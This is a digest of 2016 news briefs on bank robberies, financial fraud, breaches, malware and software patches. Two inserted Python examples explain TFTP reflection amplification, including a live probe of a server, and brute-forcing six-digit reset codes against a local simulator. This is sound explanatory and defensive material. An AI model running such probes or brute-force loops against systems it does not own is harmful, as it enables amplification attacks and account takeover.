Bearded bandit robs Lafayette bank Monday. Authorities are searching March 22 for a man suspected of committing a string of robberies at multiple banks in the San Francisco Bay Area including a Chase Bank branch and a Bank of Stockton branch March 21. The suspect is also tied to a March 11 robbery at a Wells Fargo bank branch in Concord.
Microsoft, Samba preparing patch for severe “Badlock” flaw. Developers from Microsoft Corporation and Samba worked to patch a critical vulnerability dubbed “Badlock” after discovering that the flaw could affect several versions of Windows and Samba software. Researchers will release patches and details for the vulnerability April 12.
‘Syrian Electronic Army’ members face hacking charges. The U.S. Department of Justice charged three members of the Syrian Electronic Army for unauthorized access to computers, receiving proceeds of extortion, money laundering, and wire fraud after the trio allegedly deployed a spear-phishing attack in support of the Syrian government and president which aimed to compromise the computer systems of the U.S. Federal Government, a U.S. Marine Corps recruiting site, international organizations, media organizations, and other private-sector entities.
CCleaner 5.16 released with Windows 10 Edge, Chrome, and Opera Improvements. Piriform released CCleaner 5.16, its system cleaning and privacy tool, which includes bug patches and improvements to Google Chrome cleaning, Microsoft Edge temporary file cleaning, and Opera browser application cache cleaning that aim to help users clear and protect their information after closing an application or using a browser.
Microsoft adds new feature in Office 2016 that can block macro malware. Microsoft Corporation reported that it will be implementing a new feature in its Office 2016 suite that will allow corporate network administrators to stop the execution of macro malware arriving in content from untrusted sources. The new feature can be controlled via Group Policy and configured per application.
Miami man pleads guilty to multimillion-dollar scheme to defraud commercial lenders and U.S. Export-Import Bank. Officials from the U.S. Department of Justice and the Export-Import Bank of the U.S. (EXIM) announced March 21 that a Miami man pleaded guilty for his role in a scheme to defraud 2 commercial lenders and EXIM out of more than $11 million after he and co-conspirators utilized companies they controlled to create fictitious invoices for the sale of merchandise, factored the invoices to 2 Miami-area lenders, transferred the funds they received through multiple bank accounts under their control, and used the proceeds to pay off prior factored invoices from 2007 – 2012. Officials stated that the man extended the scheme by creating false invoices and shipping documents to obtain a loan guaranteed by EXIM, and later defaulted on the loan, causing a $2 million loss to the U.S.
Turkish national arrested for conspiring to evade U.S. sanctions against Iran, money laundering and bank fraud. The U.S. Department of Justice announced March 21 that a dual citizen of Turkey and Iran was arrested March 19 and indicted on Federal charges for his alleged role in an international scheme to circumvent U.S. economic sanctions by conducting hundreds of millions of dollars’ worth of transactions on behalf of the Iranian government and Iranian businesses, laundering the proceeds, and concealing the true nature of the illicit transactions from U.S. banks and the U.S. Department of the Treasury’s Office of Foreign Assets Control through a network of companies located in Iran, Turkey, and elsewhere between 2010 – 2015. Two other Iranian citizens included in the indictment remain at large for their alleged involvement in the scheme.
Google issues emergency patch for critical Android rooting exploit. Google released an emergency security patch addressing an elevation of privilege vulnerability that affects all Android devices running kernel versions 3.4, 3.10, and 3.14, which could allow a local malicious application, including rooting applications that customers had previously installed, to execute arbitrary code in the kernel.
“Surprise” ransomware uses TeamViewer to infect victims. A new ransomware dubbed Surprise was discovered infecting users’ personal computers (PCs) through poorly secured TeamViewer installations, encrypting victims’ files with the AES-256 algorithm, securing each file’s encryption key with an RSA-2048 master key, and uploading the file to the command and control (C&C) server. Once a target’s files are encrypted, a “.surprise” extension is appended to every file and the victim is presented with a ransom note.
Two arrested after boarding plane with bundles of fake credit cards, detectives said. Officials from the Broward Sheriff’s Office announced March 18 that 2 men were arrested at Fort Lauderdale-Hollywood International Airport March 16 after security officials detected a total of 186 fraudulent Vanilla Visa and Walmart Stores, Inc., gift cards in the pair’s checked luggage. Authorities stated that 83 of the cards were re-encoded with real credit card numbers, some of which were issued by banks to several card-holders in Indiana.
iOS zero-day breaks Apple’s iMessage encryption. Researchers from Johns Hopkins University discovered a zero-day flaw in the encryption of Apple’s iOS operating system which could allow attackers to decrypt intercepted iMessages in iOS 9 and older iOS versions. Apple Inc. partially patched the vulnerability in iOS 9, but reported that the flaw will be completely patched in iOS 9.3 March 21.
Symantec patches high risk vulnerabilities in Endpoint protection. Symantec released a security update for its Symantec Endpoint Protection (SEP) product which patched three high risk security flaws including a cross-site request forgery (CSRF) vulnerability, a Structured Query Language (SQL) injection vulnerability, and a bypass security flaw that could allow authorized users with low privileges to gain elevated access to the Management Console, as well as enable attackers to achieve arbitrary code execution on a victim’s device by bypassing the SEP Client security mitigations, among other actions.
There were over 16,000 software bugs detected in 2015. Secunia researchers released a report detailing that in 2015, 16,081 flaws were found in 2,484 software applications from 263 different vendors including Google, Adobe, Microsoft, and Oracle, among others, and that 57 percent of the vulnerabilities could be exploited from a remote network. The report stated that there was a 2 percent increase in vulnerabilities from 2014 – 2015.
Nevada man convicted of perpetrating nationwide multi-million dollar fraud scheme. Officials from the U.S. Department of Justice’s Tax Division announced March 17 that a Nevada man was found guilty of orchestrating a $2 million Nigerian oil investment fraud scheme from 2004 – 2012 after he and a co-conspirator misled investors by falsely claiming that the invested money would be used to purchase an oil refinery in the Bahamas and to fund the production, refinement, and shipment of crude oil from Nigeria to the Bahamas. The money was instead used for personal expenses or transferred to unknown bank accounts in China, and officials stated the man also falsely claimed individual unemployability compensation benefits from the U.S. Department of Veterans Affairs.
Dallas FBI searching for ‘Bad Hair Bandit’ in string of Preston Road bank robberies. The Dallas FBI is searching March 17 for a man dubbed the “Bad Hair Bandit” suspected of committing five robberies or attempted robberies at the BB&T Bank, Comerica Bank, Bank of Texas, and two separate BBVA Compass Banks in Dallas since January.
Stagefright exploit puts millions of Android devices at risk. NorthBit released a report addressing a vulnerability dubbed Metaphor, which affects Android versions 2.2 – 4.0, as well as 5.0 and 5.1, after security researchers discovered a new way to exploit a previously patched remote code execution vulnerability found in Stagefright, Android’s mediaserver and multimedia library. Researchers reported that attackers tricked victims into clicking a malicious link sent via email that would execute the exploit.
iCloud account hijacking scam is as bad as ransomware. Security researchers discovered that attackers could compromise a victim’s Apple iCloud account and turn the device’s own security features, Find My Mac and Find My iPhone, against the victim. The two features enabled attackers to lock the device and display a ransomware-style message on the target’s device.
2 men indicted by Federal grand jury for using skimming device at Chesterfield bank. Two Estonian men were arrested and indicted by a Federal grand jury March 15 for using a skimming device to steal the financial information of up to 40 people at a Bank of America in Richmond. Authorities have tied the pair to a scheme which targeted SunTrust, Bank of America, and State Department credit union branches in Maryland and Virginia after a subsequent search of the duo’s apartment revealed 94 magnetic-stripe cards, $32,000 in cash, and ATM skimmer hardware.
Oregon man charged with using fictitious financial instruments and failing to file income tax returns. Officials from the U.S. Department of Justice’s Tax Division announced March 15 charges against an Oregon man after he allegedly devised and participated in a scheme to defraud U.S. financial institutions out of money by making, presenting, and transmitting more than 300 fraudulent financial instruments purportedly worth over $100 trillion, and promoted the instruments as ways to pay off debts and Federal income taxes through seminars and private client consultations from 2008 – 2015. The suspect also failed to file income tax returns and report his income to the U.S. Internal Revenue Service for several years.
Middle-aged US bloke pleads guilty to iCloud celeb nude photo hack. The U.S. Department of Justice reported March 16 that a man from Lancaster pleaded guilty to one count of unauthorized access to a protected computer after he illegally accessed and downloaded images from 50 iCloud accounts and 72 Gmail accounts via phishing attacks from November 2012 – September 2014.
AceDeceiver iOS trojan abuses Apple’s Fairplay DRM System to infect users. Researchers from Palo Alto Networks reported that a new iOS trojan dubbed AceDeceiver was targeting Apple, Inc.’s FairPlay digital rights management (DRM) system and can infect both jailbroken and non-jailbroken devices by using a FairPlay Man-in-the-Middle (MitM) attack: attackers request an authorization code for an app and distribute that code to any device of their choice, allowing them to act as a middleman between a victim’s personal computer (PC) and the App Store and to spread pirated apps.
Malvertising campaign hits MSN.com, NY Times, BBC, AOL. Security researchers from Malwarebytes and Trustwave discovered that a malvertising campaign was targeting popular Web sites such as the New York Times, Microsoft’s MSN Web site, and The Hill, among other Web sites, by using the ad networks hosted on each Web site to serve malicious ads that could lead users to other sites hosting an exploit kit (EK).
Database of abandoned iOS app exposes details for 198,000 users. Security researchers from MacKeeper discovered that the MongoDB database associated with the discontinued Kinoptic iOS app exposed 198,000 users’ information online including usernames, email addresses, and hashed passwords, among other data, via a default MongoDB configuration that allowed the public to access its content without any form of authentication.
SEC charges operator of Ponzi scheme that claimed to offer “bridge loans” to Jamaican businesses. The U.S. Securities and Exchange Commission announced March 15 that Federal officials arrested a Miami resident March 13 for allegedly operating a $10 million Ponzi scheme where he solicited over 21 investors across 6 States and Washington, D.C. by claiming their money would be used for “bridge loans” to Jamaican businesses awaiting funds from bank loans, and touting investment opportunities and investment-funded projects in Jamaica via YouTube videos. The investment funds were instead used to pay other investors and for personal expenses.
Securities and Exchange Commission: Bakersfield Investment Club a fraud. The U.S. Securities and Exchange Commission announced the week of March 7 charges against the chief executive officer (CEO) of Bakersfield Investment Club in California after he ran an $11 million fraudulent investment scheme in which he purchased real estate and businesses with money from over 400 investors and titled the properties in his own name in order to defraud investors and use the money to fund personal expenses.
Radamant C&C server manipulated to spew decryption keys. Security researchers from InfoArmor reported that a flaw in Radamant ransomware’s command and control (C&C) server could potentially allow researchers to decrypt victims’ files without requiring user interaction by registering the infected machine within the malware control center via a Hypertext Transfer Protocol (HTTP) POST request. Researchers reported the request needs to contain public and private encryption keys, as well as a unique identifier of the bot to bypass the filter and avoid additional vulnerability exploits.
VMware vRealizes that vRealize has XSS bugs on Linux. VMware released version 7.0.1, the first maintenance update of its vRealize Automation product for Linux systems, after discovering that a pair of cross-site scripting (XSS) vulnerabilities could compromise a user’s workstation.
Amex investigates possible data breach. American Express reported that it is investigating a potential data breach in California after one of its third-party service providers was compromised, potentially exposing customer names, account numbers, expiration dates, and other personal information. Officials reported the investigation was conducted as a precautionary measure.
Suffocating volume of security alerts challenges incident response. Phantom and Enterprise Strategy Group (ESG) released a report stating that 74 percent of large companies regularly disregard security alerts due to the increase in information technology (IT) activities that pull staff from daily workflow tasks. With the increase in IT activities, the report stated, companies face challenges in monitoring incident response (IR) processes end-to-end, keeping up with the high volume of security alerts and external threat intelligence, and coordinating between IT and security teams.
Google tracks use of HTTPS on top 100 websites. Google released its transparency report March 15, which tracks the progress of encryption efforts for its own products and the world’s most visited Web sites and includes a new tracking service that monitors the state of Hypertext Transfer Protocol Secure (HTTPS) use on the world’s top 100 third-party Web sites.
AIG affiliates charged with mutual fund shares conflicts. The U.S. Securities and Exchange Commission announced March 14 that 3 American International Group, Inc., (AIG) affiliates, Royal Alliance Associates, Inc., SagePoint Financial, and FSC Securities Corporation agreed to pay more than $9.5 million to settle charges that the firms placed mutual fund clients in more expensive share classes in order to collect approximately $2 million in extra fees without disclosing to clients the option to buy shares without additional charges. The firms additionally failed to monitor advisory accounts on a quarterly basis, and failed to implement compliance policies and procedures that ensured advisory service fees and trading costs remained in the best interest of clients.
CEO of microcap company charged with securities fraud for falsely claiming millions in revenue from contracts with Nigeria and other foreign countries. Federal authorities in San Francisco announced charges against the chief executive officer (CEO) of RVPlus Inc., March 14 after he was arrested in San Francisco March 13 for allegedly filing false reports with the U.S. Securities and Exchange Commission (SEC) and creating misleading press releases and blog posts which falsely certified that RVPlus Inc., had entered into contracts with Nigeria, Haiti, and Liberia worth more than $1.9 billion, and held more than $26 million in short-term accounts receivables from the agreements. The CEO also falsely claimed that his not-for-profit, ECCO2 Corp., was an affiliate organization of the United Nations Convention on Climate Change and could receive over $100 billion in financial aid to fund the organization’s projects.
Recent wave of malware uses macro-enabled Word documents and Windows PowerShell. Security researchers from Palo Alto Networks discovered that attackers were using a new tactic to distribute malware by combining spam campaigns, malicious Word documents, and Windows PowerShell code. Researchers reported that the macro code embedded within each malicious Word document starts a hidden instance of Windows PowerShell to download malicious scripts.
Yahoo fixes ridiculously simple email address spoofing bug. Yahoo! released patches fixing an email spoofing vulnerability after a security researcher from Vulnerability Lab discovered Yahoo! Mail’s Basic interface, also named Classic Mode, allowed attackers to send malicious emails by changing Hypertext Transfer Protocol (HTTP) requests sent to the server and changing the “from address” associated with each new email.
Code.org flaw exposes volunteer email addresses. An official from Code.org, a non-profit organization that helps teach computer science, reported that the email addresses of its volunteers were allegedly compromised after a vulnerability was found on its Web site that allowed an unauthorized recruiting firm to obtain private email addresses. The company patched the flaw, stating that its servers were not vulnerable and the details of its 10 million teachers and students were not exposed.
Vulnerability in torrent portal software exposes user private information. An anonymous security researcher reported that the SceneAccess Web site, a private torrent portal, was susceptible to a security flaw in its built-in BBcodes (Bulletin Board Code) that allowed attackers to expose details pertaining to the Web site’s users, including clients’ Internet Protocol (IP) addresses, by nesting BBcode inside an image Uniform Resource Locator (URL) and sending users the malicious image via open forum threads or private messages.
DROWN vulnerability still unpatched by most cloud services. A team of researchers released a report stating that the severe vulnerability Decrypting RSA with Obsolete and Weakened eNcryption (DROWN), which affects many cloud services, remained unpatched after security researchers found that the attack affects Hypertext Transfer Protocol Secure (HTTPS) and other services that rely on Secure Sockets Layer (SSL) and Transport Layer Security (TLS). The vulnerability allows attackers to compromise an encrypted session even if the session is encrypted with a more secure TLS protocol.
SEC charges Oregon-based investment group and executives with defrauding investors. The U.S. Securities and Exchange Commission charged Aequitas Management LLC, 3 executives, and 4 affiliates March 10 with defrauding over 1,500 investors nationwide after the firm did not disclose its insolvency to investors and continued to raise more than $350 million from January 2014 – January 2016 by issuing promissory notes with high rates of return. The firm used investor funds to repay earlier investors, for personal expenses, to pay business expenses, and for student loan receivables of for-profit education provider Corinthian Colleges.
Three high severity DoS flaws patched in BIND. The Internet Systems Consortium (ISC) released updates for several versions of its BIND DNS software fixing three high severity denial-of-service (DoS) vulnerabilities that could allow remote attackers to crash the BIND name server (named) process by sending a specially crafted query.
“Libotr” library flaw exposes popular IM apps. A security researcher from the firm X41 D-Sec discovered a serious vulnerability in the “libotr” library that could allow a remote attacker to execute arbitrary code by sending large messages that trigger a heap buffer overflow in libotr, as well as to mount denial-of-service (DoS) attacks. X41 D-Sec released a proof-of-concept intended to crash the Off-The-Record (OTR) plugin in Pidgin on x86_64 Linux systems.
Firefox 45 patches 22 critical vulnerabilities. Mozilla released Firefox 45 which patched 40 vulnerabilities in the Web browser components, including a heap-based buffer overflow flaw, and 14 flaws in its Graphite 2 library that could allow an attacker to execute arbitrary code execution and denial-of-service (DoS) attacks, among other patched vulnerabilities.
SAP patches 28 vulnerabilities across multiple products. SAP released security updates for several of its products patching 28 vulnerabilities, including 6 cross-site scripting (XSS) and information disclosure flaws, 5 authentication bypass flaws, 3 XML external entity (XXE) flaws, and 2 implementation flaws, among other vulnerabilities.
CryptoWall, Locky dominate ransomware landscape: Report. Researchers from Fortinet released a report stating that the Locky ransomware was the second most prevalent ransomware family, behind CryptoWall, and accounted for 16.47 percent of a total of 18.6 million attacks collected. The ransomware is distributed internationally but has primarily targeted U.S. users through malicious documents attached to spam emails.
Adobe patches Flash zero-day under attack. Adobe released an emergency out-of-band update fixing a zero-day vulnerability in Flash Player after a security researcher from Kaspersky Lab found that the flaw was being exploited to take control of vulnerable systems in limited, targeted attacks.
Alabama car dealers admit bank fraud. Nashville officials announced March 10 that 2 New Market, Alabama residents pleaded guilty to charges alleging that the pair used their pre-owned car business to defraud 65 financial institutions by seeking multiple loans on over 100 vehicles from different financial institutions by using fraudulently obtained titles as collateral. The scheme caused $5.9 million in losses over a five year period.
Money returning to investors harmed by unregistered broker. The U.S. Securities and Exchange Commission (SEC) announced March 9 that Cyprus-based Banc de Binary Ltd., agreed to pay a total of $11 million to the SEC and Commodity Futures Trading Commission (CFTC) to settle charges that the company, its founder, and three affiliates illegally sold binary options to U.S. investors after the company failed to register as a broker-dealer before communicating directly with U.S. clients via phone, email, and instant messenger chats, and soliciting U.S. customers through YouTube videos, spam emails, and other Internet advertising outlets. A Fair Fund was established to compensate harmed investors and Banc de Binary Ltd., its founder, and its affiliates agreed to be suspended from the securities industry for a year and permanently banned from issuing penny stock offerings.
Greenwood man indicted for mortgage fraud scheme. A Greenwood, Missouri home builder, doing business as Penrod Homes, Inc., was charged March 8 for his role in a scheme to defraud mortgage lenders from May 2005 – June 2007 where he and others allegedly recruited buyers to apply for mortgage loans to purchase 61 homes in Greenwood and Peculiar that later went into foreclosure causing the banks and mortgage companies approximately $4.5 million in losses, and accepted illegal kickbacks totaling $1.5 million on 57 of the homes sold.
Greenville broker indicted in $3 million Ponzi scam. A former Greenville, South Carolina broker was indicted on Federal fraud charges March 8 after he allegedly ran a $2.8 million Ponzi scheme where he advised clients to invest their money into a fictitious company, SG Investment Management, provided investors with bogus earning statements, and returned a portion of the funds to make it appear as though the clients’ funds were invested and earning profits between 2000 – 2014.
Louisville attorney charged with wire fraud and money laundering. The U.S. Attorney’s Office in Kentucky announced March 8 that a former attorney and executor of 7 estates was indicted on Federal charges after he allegedly defrauded the estates of approximately $1,666,671 by withdrawing cash from the estate accounts without authorization and using the money for personal expenses while mischaracterizing the withdrawals as estate expenses from November 2008 – February 2015. The executor also allegedly laundered fraud proceeds by using funds from one estate to conceal the depletion of the funds from another estate in July 2014.
600,000 TFTP servers can be abused for reflection DDoS attacks. Researchers from Edinburgh Napier University reported that a combination of flaws in the Trivial File Transfer Protocol (TFTP) and publicly exposed, misconfigured TFTP servers can easily be exploited for reflection distributed denial-of-service (DDoS) attacks, after finding that 599,600 TFTP servers were publicly reachable and offered an amplification factor of about 60. Because TFTP runs over UDP, an attacker can send a small read request with a spoofed source address and the server sends its much larger reply, and its retransmissions of that reply, to the victim. The vulnerable TFTP servers can be used to launch attacks on other Internet-available services, or used as a pathway to targets inside a closed network.
Cisco patches a bunch of cable modem vulns. Cisco Systems reported three vulnerabilities affecting five of its customer-premises devices: two wireless residential gateways, the DPC3941 and DPC3939B, whose Web-based administration interface can be exploited via specially crafted Hypertext Transfer Protocol (HTTP) requests; two cable modems, the DPC2203 and EPC2203, that allow remote code execution via an HTTP input validation vulnerability; and one gateway, the DPQ3925, that can be crashed in a denial-of-service (DoS) attack via an HTTP handling flaw.
Samsung fixes driver update tool to prevent malicious takeover. Samsung released updates for its SW Update Tool patching two security issues that could have been exploited for Man-in-the-Middle (MitM) attacks, after a security researcher from Core Security discovered that, when contacting Samsung’s servers, the tool sent users’ system information in cleartext and did not verify the authenticity of the driver downloads it received from those servers, so an attacker on the network path could substitute a malicious driver. Samsung patched the issues by encrypting communication between the tool and its servers and adding a verification mechanism for downloaded drivers.
Triada trojan most advanced mobile malware yet: Kaspersky. Security researchers from Kaspersky discovered a new trojan, dubbed Triada, reportedly the most advanced mobile malware yet, that targets Android operating system (OS) devices and uses rooting capabilities to redirect financial short message service (SMS) transactions, buying additional content or stealing money from victims on behalf of an advertising botnet. The trojan injects its code into the Zygote parent process, from which every Android application is forked, so its code runs in the context of every application on the device.
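To see how the amplification figure arises, and to measure it for a server you own, the Python below is an added example (not code from the researchers or the report): it builds an RFC 1350 read request, parses the DATA blocks that come back, and computes bytes-returned per byte-sent. The exchange it evaluates offline is constructed; probe_tftp() only touches the network if you call it against a host of yours. The reported factor of about 60 depends on how many times a given server retransmits an unacknowledged block, so expect it to vary by implementation.

```python
"""Added example (not from the original page): measure the UDP reflection
amplification a TFTP server offers.  An attacker sends a tiny Read Request
(RRQ) with a spoofed source address; the server answers the victim with
512-byte DATA blocks and retransmits them when no ACK arrives.  The packets
below are constructed offline; probe_tftp() talks to a real server only if
you call it."""
import socket
import struct

OP_RRQ, OP_DATA, OP_ERROR = 1, 3, 5


def build_rrq(filename: str, mode: str = "octet") -> bytes:
    """RFC 1350 RRQ: opcode 1, filename, NUL, mode, NUL."""
    return struct.pack("!H", OP_RRQ) + filename.encode() + b"\0" + mode.encode() + b"\0"


def parse_packet(pkt: bytes):
    """Return (opcode, block_or_errcode, payload) for a DATA or ERROR packet."""
    if len(pkt) < 4:
        raise ValueError("short TFTP packet")
    opcode, number = struct.unpack("!HH", pkt[:4])
    if opcode not in (OP_DATA, OP_ERROR):
        raise ValueError(f"unexpected opcode {opcode}")
    return opcode, number, pkt[4:]


def amplification_factor(request: bytes, responses) -> float:
    """Bytes the reflector sends toward the victim per byte the attacker
    sends.  Every datagram counts, including retransmissions of one block."""
    sent = len(request)
    received = sum(len(r) for r in responses)
    return received / sent if sent else 0.0


def probe_tftp(host: str, filename: str, timeout: float = 3.0, max_pkts: int = 32):
    """Live check (not run offline): send one RRQ, never ACK, and count what
    comes back until the server gives up or max_pkts datagrams arrive."""
    req = build_rrq(filename)
    responses = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(req, (host, 69))
        try:
            while len(responses) < max_pkts:
                data, _ = s.recvfrom(65535)
                responses.append(data)
        except socket.timeout:
            pass
    return amplification_factor(req, responses), responses


# Constructed exchange: a 19-byte RRQ for a config file, answered with block 1
# (516 bytes) that the server resends four more times because no ACK ever
# arrives.  Retransmission is what pushes the ratio far above 516/19.
SAMPLE_RRQ = build_rrq("config.bin")
SAMPLE_DATA_BLOCK = struct.pack("!HH", OP_DATA, 1) + b"\x41" * 512
SAMPLE_RESPONSES = [SAMPLE_DATA_BLOCK] * 5

if __name__ == "__main__":
    print(len(SAMPLE_RRQ), amplification_factor(SAMPLE_RRQ, SAMPLE_RESPONSES))
```

For the defensive side the number to act on is the same ratio: any TFTP listener reachable from the Internet should be firewalled to its management network, and the server's retransmission count is the knob that bounds the damage if it cannot be.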
Man spent $100K with stolen credit cards, fraud cases cracked police say. A Detroit man was arrested March 4 after he allegedly used stolen credit card information to purchase $100,000 worth of gift cards, iPads, electronic games, among other products at a minimum of 4 Kent County businesses. A subsequent search of the suspect’s home revealed hundreds of credit cards, credit-card numbers, Social Security numbers, personal information, and equipment to encode credit cards with stolen account information.
SEC announces charges against unregistered fund manager accused of hiding criminal past. The U.S. Securities and Exchange Commission charged EquityStar Capital Management and an unregistered fund manager March 8 for deceiving investors after the fund manager and company offered and sold at least $5.6 million of interests in two unregistered investment funds, Global Partners Fund and Momentum Growth Fund, and withdrew more than $1 million without the authorization or knowledge of investors. The fund manager hid felony fraud convictions and other money judgments from investors, hired a firm to manipulate Internet search results on his name to cover up negative information, and used at least three false identities to make-up the existence of bogus employees when communicating with investors, among other actions.
Virginia man pleads guilty to Federal charges for role in massive identity theft and tax fraud scheme. A Virginia man pleaded guilty March 7 for his role in a $42 million Federal income tax refund fraud scheme involving over 12,000 fraudulent tax returns and 19 co-conspirators who stole the identities of individuals and filed returns to addresses in Virginia, Maryland, and Washington, D.C. from 2008 to 2015. The suspect was responsible for filing approximately 444 fraudulent income tax returns that sought more than $1.5 million in tax refunds and caused a loss of $493,436 to the U.S. Department of the Treasury.
KeRanger ransomware is actually Linux.Encoder ported for Macs. Security researchers from Bitdefender reported that the KeRanger ransomware that targets Mac OS X systems is a rewrite of the Linux.Encoder ransomware, after finding that the encryption functions of the two were identical and that both share the same function names: encrypt_file, recursive_task, currentTimestamp, and creatDaemon.
Microsoft updates Windows, browsers to patch critical flaws. Microsoft released 13 security bulletins addressing vulnerabilities in Windows, Internet Explorer, the Edge browser, Office, server software, and the .NET Framework, including 13 Internet Explorer vulnerabilities that could allow a remote attacker to execute arbitrary code by tricking a victim into visiting a specially crafted Web site; 11 Microsoft Edge vulnerabilities; and critical vulnerabilities in how the Windows Adobe Type Manager Library handles specially crafted OpenType fonts, which can be exploited for denial-of-service (DoS) and remote code execution (RCE) attacks, among other vulnerabilities.
Adobe patches flaw in Acrobat, Reader, Digital Editions. Adobe Systems released updates for its Acrobat, Reader, and Digital Editions products to patch several critical vulnerabilities including multiple memory corruption flaws and a directory search path flaw that can be exploited to execute arbitrary code in several of the products.
Mock cyberattack tests response. The U.S. Department of Homeland Security and the U.S. Secret Service reported that more than 1,000 U.S. cybersecurity professionals from the Federal government, healthcare firms, Internet service providers, retail businesses, and phone companies were participating in a mock cyberattack exercise March 8 – March 10 to test human response and coordination in the event of a real-life cyberattack. The exercise will also look for areas of improvement to help the public and private sector become more resilient against cyber threats.
SEC charges Rhode Island agency and Wells Fargo with fraud in 38 Studios bond offering. The U.S. Securities and Exchange Commission charged Rhode Island Economic Development Corporation (RIEDC), two former executives, Wells Fargo Securities, and a former lead banker March 7 for defrauding investors in a $75 million municipal bond offering to finance 38 Studios, a startup video game company, after RIEDC allegedly loaned the startup only $50 million in bond proceeds and used the remaining proceeds to pay related bond offering expenses and establish other funds. RIEDC and Wells Fargo reportedly failed to disclose to investors that 38 Studios faced a funding shortage and could not produce the video game, causing the company to default on the loan, and failed to disclose that Wells Fargo had a side deal with 38 Studios which enabled the firm to receive additional compensation.
Google plugs 19 holes in newest Android security update. Google released fixes for 19 security issues in its Android Open Source Project (AOSP), including two remote code execution (RCE) vulnerabilities in Mediaserver that can be triggered via a specially crafted media file, and a critical elevation of privilege vulnerability in the Qualcomm performance component that enables a local malicious application to execute arbitrary code in the kernel, among other vulnerabilities.
Facebook password reset flaw earns researcher $15,000. An independent researcher from India discovered that Facebook’s beta.facebook.com domain did not rate-limit attempts to enter the six-digit code sent to users requesting a password reset via email or text message, so an attacker could simply try all one million possible codes and change any user’s password. Facebook patched the vulnerability February 23.
Intel fixes McAfee bug that allowed attackers to disable antivirus protection. Intel Security published security bulletin SB10151 with a fix for its McAfee VirusScan Enterprise product after a security researcher from Mediaservice found that attackers could bypass the administration password and unlock the protected registry keys and settings of the VirusScan Enterprise engine, disabling the antivirus protection, because the password check was improperly implemented.
Multiple passcode bypass vulnerabilities discovered in iOS 9. Researchers from Vulnerability Lab reported that Apple’s iOS versions 9.0, 9.1, and 9.2.1 contain several connected passcode bypass vulnerabilities that affect the iPhone 5, 5s, 6, and 6s, as well as iPad mini, iPad 1, and iPad 2 products. The vulnerabilities can allow an attacker with physical access to a locked device to compromise sensitive user data, including address books, photos, short message service (SMS) and multimedia messaging service (MMS) messages, emails, and phone settings, among other data.
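A six-digit code is only as strong as the controls around it, which is the point of this item. The Python below is an added example, not Facebook's code or the researcher's: ResetCodeStore models the server side of a reset flow, with an "unlimited" policy that an attacker can walk exhaustively and a hardened policy that caps attempts per code, expires the code, compares in constant time, and makes each code single-use. The user names and codes are made up; the clock parameter exists only so the expiry can be tested offline.

```python
"""Added example (not from the original page): why a six-digit reset code is
only as strong as the rate limit around it.  ResetCodeStore simulates the
server side: issue() hands out a code, verify() is the endpoint an attacker
would hammer.  With no limits an attacker guesses all 10**6 codes; the
hardened policy caps attempts per code and expires it."""
import hmac
import secrets
import time

CODE_SPACE = 10 ** 6          # 000000 .. 999999


class ResetCodeStore:
    def __init__(self, max_attempts=None, ttl_seconds=None, clock=time.time):
        # max_attempts=None and ttl_seconds=None reproduce the unlimited case.
        self.max_attempts = max_attempts
        self.ttl = ttl_seconds
        self.clock = clock
        self._codes = {}       # user -> [code, issued_at, attempts]

    def issue(self, user: str, code: str = None) -> str:
        # secrets.randbelow, not random.randint: a guessable PRNG is its own bug.
        code = code if code is not None else f"{secrets.randbelow(CODE_SPACE):06d}"
        self._codes[user] = [code, self.clock(), 0]
        return code

    def verify(self, user: str, guess: str) -> bool:
        entry = self._codes.get(user)
        if entry is None:
            return False
        code, issued_at, attempts = entry
        if self.ttl is not None and self.clock() - issued_at > self.ttl:
            del self._codes[user]
            return False
        if self.max_attempts is not None and attempts >= self.max_attempts:
            return False          # locked: the code is dead, issue a new one
        entry[2] = attempts + 1
        # Constant-time comparison so timing does not leak matching prefixes.
        if hmac.compare_digest(code.encode(), guess.encode()):
            del self._codes[user]     # single use
            return True
        return False


def brute_force(store: ResetCodeStore, user: str, max_guesses=CODE_SPACE):
    """Walk the whole code space in order.  Returns (code_or_None, guesses_made)."""
    for n in range(max_guesses):
        guess = f"{n:06d}"
        if store.verify(user, guess):
            return guess, n + 1
    return None, max_guesses


def demo():
    # Unlimited attempts: the attacker always succeeds, on average after half
    # a million requests, which is minutes of automated traffic.
    weak = ResetCodeStore()
    weak.issue("alice", code="493817")          # fixed code so the run is repeatable
    found, guesses = brute_force(weak, "alice")

    # Hardened: five attempts and a ten-minute lifetime, then the code is dead
    # whatever the guess.
    strong = ResetCodeStore(max_attempts=5, ttl_seconds=600)
    strong.issue("alice", code="493817")
    blocked, _ = brute_force(strong, "alice")
    return found, guesses, blocked


if __name__ == "__main__":
    print(demo())
```

The attempt counter has to live server-side and per code; a per-IP limit alone is defeated by distributing the guesses, and a limit that resets when a new code is requested is defeated by re-requesting. Whatever limit you pick, the test that matters is the one brute_force() performs: can the full code space be exhausted before the code expires?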
Stillwater investment adviser admits cheating clients out of $2.6M. A former investment adviser at Alternative Wealth Solutions pleaded guilty March 1 to Federal charges after he bilked approximately 50 investors in Minnesota and Wisconsin out of nearly $2.6 million and used the money to cover promised returns to other investors and for personal expenses. The adviser also admitted to creating counterfeit secured notes as proof of investment.
Scam artists hit Seagate Technology. Cupertino-based Seagate Technology reported that its current and former employees’ personal information including tax information, Social Security numbers, and salaries were compromised after a phishing email disguised as a legitimate internal company request prompted an employee to disclose employee data to an unauthorized third party. The company notified the U.S. Internal Revenue Service and is offering an identity-theft protection service to those affected.
Amazon changes stance on encryption for Fire tablets. Amazon.com, Inc., reported March 5 that it will restore full disk encryption to its Fire tablets and will release the security feature in a Fire operating system (OS) update. The company had removed the feature, along with other enterprise features, in 2015, citing low customer usage.
First fully functional Mac ransomware spread via Transmission BitTorrent client. Researchers from Palo Alto Networks reported that the official Web site of the Transmission BitTorrent client used by Mac customers was allegedly hacked, after researchers found that the Mac installer for Transmission version 2.90 offered on the site had been replaced with one embedding the KeRanger ransomware. The ransomware targets over 300 file extension types, uses Advanced Encryption Standard (AES) encryption to lock files, and demands a payment of 1 Bitcoin.
Popular WordPress plugin comes with a backdoor, steals site admin credentials. Security researchers from Sucuri discovered that an attacker using the handle wooranker was able to control WordPress user logins, run create and edit commands, and intercept user credentials before they were encrypted, among other actions, by distributing a backdoored version of a popular WordPress plugin, Custom Content Type Manager (CCTM). The attacker used the plugin to install an auto-update.php backdoor, which forced the target site to download and install another file named c.php, which in turn created wp-options.php to alter core WordPress files.
